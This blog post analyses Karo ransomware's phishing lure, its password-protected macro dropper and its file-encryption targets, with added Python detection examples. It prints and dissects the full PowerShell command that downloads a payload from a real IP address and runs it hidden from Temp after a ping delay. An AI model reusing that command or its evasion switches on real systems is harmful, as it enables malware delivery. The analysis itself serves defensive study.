
The PhishLabs Blog

Not NotPetya (An analysis of Karo Ransomware)


While there was a lively debate yesterday over whether it was Petya or NotPetya, we can all agree that what locked up some of the world's largest shipping companies, spread through the infamous SMB exploit, and may have been delivered as an infected software update, was not Karo. This obscure ransomware family was nonetheless launched into the spotlight by early confusion over Petya's initial infection vector.

Early reports of the first Petya infections cited, as a potential infection vector, an email purporting to carry an applicant's curriculum vitae and linking to a malicious executable stored on Dropbox. At the same time, Karo happened to be circulating as Microsoft Office documents named after the intended recipient's email address, often their first and last name. To many researchers, myself included, JohnDoe.doc looks like a CV. So, while your inboxes and Twitter feeds fill up with Petya/NotPetya, we are going to take a closer look at the accidental celebrity, Karo.

Initial Email

Karo showed up in our feeds yesterday morning with a typical lure. The threat actor generated pseudo-random emails from a small set of parameters, each urging the potential victim to open the attachment to find out about a pending charge of a few thousand dollars. Several social engineering tactics popular in malware delivery are present in this lure, all serving to add legitimacy during the split-second evaluation we make before opening an attachment. Each part of a lure can be broadly sorted into pieces that add legitimacy and pieces that are red flags, which allows a loose score of the lure's social engineering strength.

[Figure: Karo lure body, with the possible values of each parameter listed.]

The attacker adds authenticity to the lure with the following tactics:

  1. Sends from a well-known email provider associated with businesses 
  2. Uses the victim’s name in the subject and salutation
  3. Includes a charge amount that is large enough, but not unrealistic, to warrant immediate action and perhaps make the potential victim overlook some of the email’s red flags

There are also red flags that indicate the contents of the email should not be trusted. These include:

  1. ‘Hey’ is not a contextually appropriate salutation
  2. An email warning about an imminent charge detailed in an attachment is not credit card company standard operating procedure
  3. The sender’s name and email do not match
  4. There is no contact information below the signature
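Turning that loose score into something repeatable, here is an added example (code written for this page, not PhishLabs' own tooling) that parses a message with Python's standard email module, looks for the legitimacy cues and red flags listed above, and nets them into a score. The two messages are constructed to resemble the Karo lure and a benign billing notice; the provider list, the amount bounds and the weighting are assumptions.

```python
"""Loose social-engineering score for an email lure such as Karo's.

Added example written for this page, not PhishLabs code. Both messages below
are constructed: one resembles the lure described in the post, the other a
benign billing notice. The provider list, amount bounds and weights are
assumptions.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample resembling the Karo lure (not a real captured message).
KARO_STYLE_LURE = """\
From: John Doe <billing.dept1234@outlook.com>
To: Jane Smith <jane.smith@example.com>
Subject: Jane Smith - pending charge
Content-Type: text/plain

Hey Jane Smith,

A charge of $3,450.00 is pending on your card. The attached document has the
details. Please review it before the end of the day.

Regards,
Mark Wilson
"""

# Constructed benign notice for comparison.
BENIGN_NOTICE = """\
From: Acme Billing <billing@acme-bank.example>
To: Jane Smith <jane.smith@example.com>
Subject: Jane Smith - your statement is available
Content-Type: text/plain

Dear Jane Smith,

Your statement showing a charge of $3,450.00 is available in your online
account at https://www.acme-bank.example/statements.

Acme Billing
Customer Service: +1 (555) 010-0199
"""

KNOWN_PROVIDERS = {"outlook.com", "gmail.com", "yahoo.com"}   # assumed list
CASUAL_SALUTATION = re.compile(r"^(hey|hi there|hello friend|dear customer)\b", re.I)
AMOUNT = re.compile(r"\$\s?(?:\d{1,3}(?:,\d{3})+|\d+)(?:\.\d{2})?")
CONTACT_INFO = re.compile(r"\+?\d[\d\s().-]{6,}\d|https?://|www\.", re.I)


def score_lure(raw: str) -> dict:
    """Return legitimacy cues, red flags and a net score (higher = more suspicious)."""
    msg = message_from_string(raw)
    sender_name, sender_addr = parseaddr(msg.get("From", ""))
    recipient_name, _ = parseaddr(msg.get("To", ""))
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    salutation = lines[0] if lines else ""

    legitimacy, red_flags = [], []

    # Cues the attacker uses to look legitimate.
    if sender_addr.rsplit("@", 1)[-1].lower() in KNOWN_PROVIDERS:
        legitimacy.append("sent from a well-known email provider")
    if recipient_name and recipient_name.lower() in msg.get("Subject", "").lower():
        legitimacy.append("recipient name in subject")
    if recipient_name and recipient_name.lower() in salutation.lower():
        legitimacy.append("recipient name in salutation")
    m = AMOUNT.search(body)
    if m:
        amount = float(m.group(0).lstrip("$").replace(",", "").strip())
        if 500 <= amount <= 20_000:            # assumed "large but not absurd" range
            legitimacy.append(f"plausible charge amount ${amount:,.2f}")

    # Red flags a careful reader would catch.
    if CASUAL_SALUTATION.match(salutation):
        red_flags.append(f"casual salutation {salutation!r}")
    local_part = sender_addr.split("@")[0].lower()
    name_tokens = re.findall(r"[a-z]+", sender_name.lower())
    if name_tokens and not any(tok in local_part for tok in name_tokens):
        red_flags.append(f"display name {sender_name!r} does not match {sender_addr}")
    if not CONTACT_INFO.search(body):
        red_flags.append("no phone number or URL below the signature")

    return {
        "legitimacy": legitimacy,
        "red_flags": red_flags,
        "score": 2 * len(red_flags) - len(legitimacy),   # assumed weighting
    }
```

Run `score_lure(KARO_STYLE_LURE)` and the three red flags from the list above come back alongside four legitimacy cues, for a net score of 2; the benign notice trips no red flag and scores -3. The weighting deliberately counts a red flag for more than a cue, since a single mismatch is what a trained reader acts on.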

Attachment

The Office documents attached to Karo emails are password protected. While not common in malware spam, password-protected Office documents were employed in several TrickBot campaigns earlier this year. Password protection makes antivirus evasion easier, because a scanner that does not know the password cannot inspect the document's contents, but the extra step it imposes on the victim is likely why the technique is not widely adopted: it probably results in a lower infection rate.

[Figure: VirusTotal scan of the password-protected Karo dropper.]

If the malicious document is opened and the password, which appears to be the same for every document in this campaign, is entered, the victim is asked to enable macros. The document claims that because it is 'protected' it must be opened on a PC with content enabled.

[Figure: The opened Karo document.]

Download & Execution

The enabled macro launches cmd.exe and runs a PowerShell command that downloads and executes the ransomware payload. PowerShell is commonly used by malware families to download and install themselves on a victim's machine. The command below contains everything needed to fetch and start Karo without any further user interaction.

Cmdline: powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.165.29.78/~alex/svchost.exe' , 'C:\Users\SBOX~1\AppData\Local\Temp\svchost.exe')& PING -n 15 127.0.0.1>nul & %tmp%\svchost.exe

The best way to see how it pulls this off is to dissect the command piece by piece.

powershell.exe -w hidden -nop -ep bypass

The first step is starting PowerShell, which is entered on the command line as powershell.exe. Next come several arguments that help the ransomware avoid protections and operate unnoticed:

-w hidden (WindowStyle Hidden) runs PowerShell without a visible window, so the victim sees nothing on screen

-nop (NoProfile) stops PowerShell from loading the current user's profile scripts, sidestepping any logging or hardening a profile might set up and making start-up faster

-ep bypass (ExecutionPolicy Bypass) sets the execution policy for this session so that nothing blocks or warns about the code. The execution policy only governs script files, not a command passed on the command line like this one, and it was never designed as a security boundary, so the switch is not strictly needed here; it is included for robustness.

Download

With those switches in place, the command creates a System.Net.WebClient object and calls its DownloadFile method, which reaches out and grabs the payload from the URL given as the first argument.

(New-Object System.Net.WebClient)
.DownloadFile('http://185.165.29.78/~alex/svchost.exe'

The second argument is the location where PowerShell saves the downloaded program.

'C:\Users\SBOX~1\AppData\Local\Temp\svchost.exe'

Many malware families play with file extensions to further disguise their purpose, serving the executable under a .png or .jpg name and then saving and running it as an executable. In the command above the payload is instead named svchost.exe end to end, borrowing the name of a legitimate Windows process so that it blends in if someone glances at the Temp directory or a process list. The SBOX~1 component is an 8.3 short name for the user profile directory, here apparently that of an analysis sandbox.

Execution

At this point, Karo is sitting in the victim's Temp directory awaiting its order to start, which comes from the second half of the command:

 & PING -n 15 127.0.0.1 >nul

This section tells the machine to ping itself 15 times before continuing. Threat actors often do this to delay execution so that sandboxes and researchers conclude nothing is happening: ping -n 15 sends one echo request roughly every second, so the chain pauses for about 14 seconds. Pinging the loopback address says nothing about internet connectivity, so here it is purely a sleep. The >nul simply discards ping's output, and because the pieces are joined with a single & rather than &&, the final part of the command runs whether or not the ping succeeds:

%tmp%\svchost.exe

This starts the ransomware downloaded at the beginning of the command, and encryption begins.
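The whole download-and-execute chain above, as detection logic in Python (an added example for this page, not PhishLabs or Karo code): the function takes a process command line such as the one the macro spawns, checks it for each piece discussed in this section, works out how long the ping sleep is, notes whether the chain is unconditional, and pulls out the download URL for responders. The indicator names, the benign comparison command lines and the verdict rule are assumptions.

```python
"""Flag the PowerShell download-and-execute chain that Karo's macro runs.

Added example, not PhishLabs or Karo code. The command line from the post is
the malicious sample; the two benign command lines are constructed for
comparison. Indicator names and the verdict rule are assumptions.
"""
import re

# The command line captured in the post, as one string.
KARO_CMDLINE = (
    "powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient)"
    ".DownloadFile('http://185.165.29.78/~alex/svchost.exe' , "
    "'C:\\Users\\SBOX~1\\AppData\\Local\\Temp\\svchost.exe')"
    "& PING -n 15 127.0.0.1>nul & %tmp%\\svchost.exe"
)

# Constructed benign command lines for comparison.
BENIGN_CMDLINES = [
    "powershell.exe -NoProfile -File C:\\Scripts\\rotate-logs.ps1",
    "ping -n 4 127.0.0.1",
]

# (indicator name, regex). Short and long switch spellings are both accepted
# because PowerShell lets callers abbreviate parameter names.
INDICATORS = [
    ("hidden window",           r"-w(?:indowstyle)?\s+hidden"),
    ("no profile",              r"-no(?:p|profile)\b"),
    ("execution policy bypass", r"-e(?:p|xecutionpolicy)\s+bypass"),
    ("WebClient download",      r"System\.Net\.WebClient\)\s*\.DownloadFile\("),
    ("drop to temp dir",        r"[\\/]Temp[\\/][^'\"]+\.exe|%tmp%\\"),
    ("ping sleep",              r"\bping\s+-n\s+\d+\s+127\.0\.0\.1"),
    ("run from temp",           r"%tmp%\\[^\s&]+\.exe"),
    ("system-binary name",      r"[\\/](?:svchost|lsass|csrss|explorer)\.exe"),
]


def analyse_cmdline(cmdline: str) -> dict:
    """Return the indicators present, the implied sleep, the URLs and a verdict."""
    hits = [name for name, rx in INDICATORS if re.search(rx, cmdline, re.I)]

    # ping -n N sends N echo requests about one second apart, so the chain
    # pauses roughly N-1 seconds before the next command runs.
    m = re.search(r"\bping\s+-n\s+(\d+)", cmdline, re.I)
    sleep_seconds = max(int(m.group(1)) - 1, 0) if m else 0

    # A single '&' runs the next command unconditionally; '&&' would make it
    # depend on the previous command's exit code.
    unconditional = bool(re.search(r"(?<!&)&(?!&)", cmdline))

    # Pull out every URL so responders get the download server directly.
    urls = re.findall(r"https?://[^\s'\"),]+", cmdline, re.I)

    return {
        "indicators": hits,
        "sleep_seconds": sleep_seconds,
        "unconditional_chain": unconditional,
        "urls": urls,
        # Assumed rule: download plus execute together, or three or more indicators.
        "malicious": {"WebClient download", "run from temp"} <= set(hits) or len(hits) >= 3,
    }
```

On the post's command line all eight indicators fire, the sleep works out to 14 seconds, the chain is flagged as unconditional and the single URL is extracted; the benign `-NoProfile -File` invocation and a plain `ping -n 4` each trip one indicator and stay below the verdict threshold, which is the point of requiring a combination rather than any lone switch.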

Encryption

[Figure: Karo's .NET encryption method.]

Karo, written in .NET, uses the framework's built-in RijndaelManaged class (the Rijndael/AES implementation) to encrypt files with the following extensions:

.txt, .sql, .cs, .cpp, .text, .js, .html, .java, .pl, .c, .mdb, .ruby, .jpg, .png, .bmp, .doc, .csv, .xls, .docx, .docm, .ppt

It then appends the extension ".ipygh" to each one. These twenty-one file types cover most of the files a user is likely to value while leaving the system functional enough to pay the ransom and restore them. Encrypting Office document and picture extensions is standard practice for ransomware, but Karo stands out for including source files for several programming languages. Few users have .ruby or C++ files sitting on their computer (and .ruby is not even the usual Ruby source extension, which is .rb), while Python's .py was curiously left off the list, as were the newer Office formats .xlsx and .pptx.
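Because Karo announces itself on disk, a burst of new .ipygh files whose original extensions are on the target list is a usable behavioural signal. The following added example (written for this page, not Karo or PhishLabs code) runs that check over a constructed list of file-system events; the five-second window and three-file threshold are assumptions, while the suffix and the 21 extensions are taken from the post.

```python
"""Spot a Karo-style encryption burst from file-system events.

Added example, not PhishLabs or Karo code. The events below are constructed;
the '.ipygh' suffix and the 21 target extensions come from the post; the
burst window and threshold are assumptions.
"""
import ntpath
from collections import Counter
from typing import Optional

KARO_SUFFIX = ".ipygh"
KARO_TARGETS = {
    ".txt", ".sql", ".cs", ".cpp", ".text", ".js", ".html", ".java", ".pl",
    ".c", ".mdb", ".ruby", ".jpg", ".png", ".bmp", ".doc", ".csv", ".xls",
    ".docx", ".docm", ".ppt",
}

# Constructed events: (seconds since boot, operation, path).
SAMPLE_EVENTS = [
    (100.0, "create", r"C:\Users\alice\Documents\notes.txt.ipygh"),
    (100.1, "delete", r"C:\Users\alice\Documents\notes.txt"),
    (100.3, "create", r"C:\Users\alice\Pictures\cat.jpg.ipygh"),
    (100.4, "delete", r"C:\Users\alice\Pictures\cat.jpg"),
    (100.6, "create", r"C:\Users\alice\src\app.cs.ipygh"),
    (100.7, "delete", r"C:\Users\alice\src\app.cs"),
    (101.0, "create", r"C:\Users\alice\Documents\budget.xlsx"),  # .xlsx is not on Karo's list
    (101.2, "create", r"C:\Users\alice\src\main.py"),            # neither is .py
    (150.0, "create", r"C:\Users\alice\Desktop\old.doc.ipygh"),  # lone file, outside any burst
]


def original_name(path: str) -> Optional[str]:
    """Strip the ransomware suffix and return the pre-encryption path, or None."""
    if not path.lower().endswith(KARO_SUFFIX):
        return None
    return path[: -len(KARO_SUFFIX)]


def detect_burst(events, window: float = 5.0, min_files: int = 3) -> dict:
    """Report encrypted files, files Karo would skip, and whether a burst occurred.

    A burst is `min_files` or more '.ipygh' creations inside any `window`
    seconds whose original extension is one Karo targets (assumed rule).
    """
    encrypted, spared = [], []
    for _ts, op, path in events:
        if op != "create":
            continue
        orig = original_name(path)
        if orig is not None:
            targeted = ntpath.splitext(orig)[1].lower() in KARO_TARGETS
            encrypted.append((_ts, orig, targeted))
        elif ntpath.splitext(path)[1].lower() not in KARO_TARGETS:
            spared.append(path)

    times = sorted(ts for ts, _, targeted in encrypted if targeted)
    burst = any(
        sum(1 for t in times[i:] if t - start <= window) >= min_files
        for i, start in enumerate(times)
    )
    by_ext = Counter(ntpath.splitext(o)[1].lower() for _, o, targeted in encrypted if targeted)

    return {
        "encrypted": [o for _, o, _ in encrypted],
        "spared": spared,
        "burst": burst,
        "by_extension": dict(by_ext),
    }
```

On the sample events three targeted files are renamed within a second, so `detect_burst` raises the burst flag and lists the four original file names, while the .xlsx spreadsheet and the .py script show up as spared; feeding it only the lone .doc event at 150 seconds produces no burst. In production the same logic would sit on a file-system audit feed or Sysmon file-create events rather than a hard-coded list.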

Conclusion

While neither Petya nor NotPetya, Karo is an interesting piece of malware. It cobbles together the tactics, techniques, and procedures of other, more prevalent ransomware strains and, for a day at least, appeared to have put the world on lockdown. If the author behind it follows their usual pattern, we will likely see Karo again in a few months. I am sure they are hoping not to launch their next campaign at the same time as a record-setting one that has the world talking about ransomware.

Topics: Ransomware
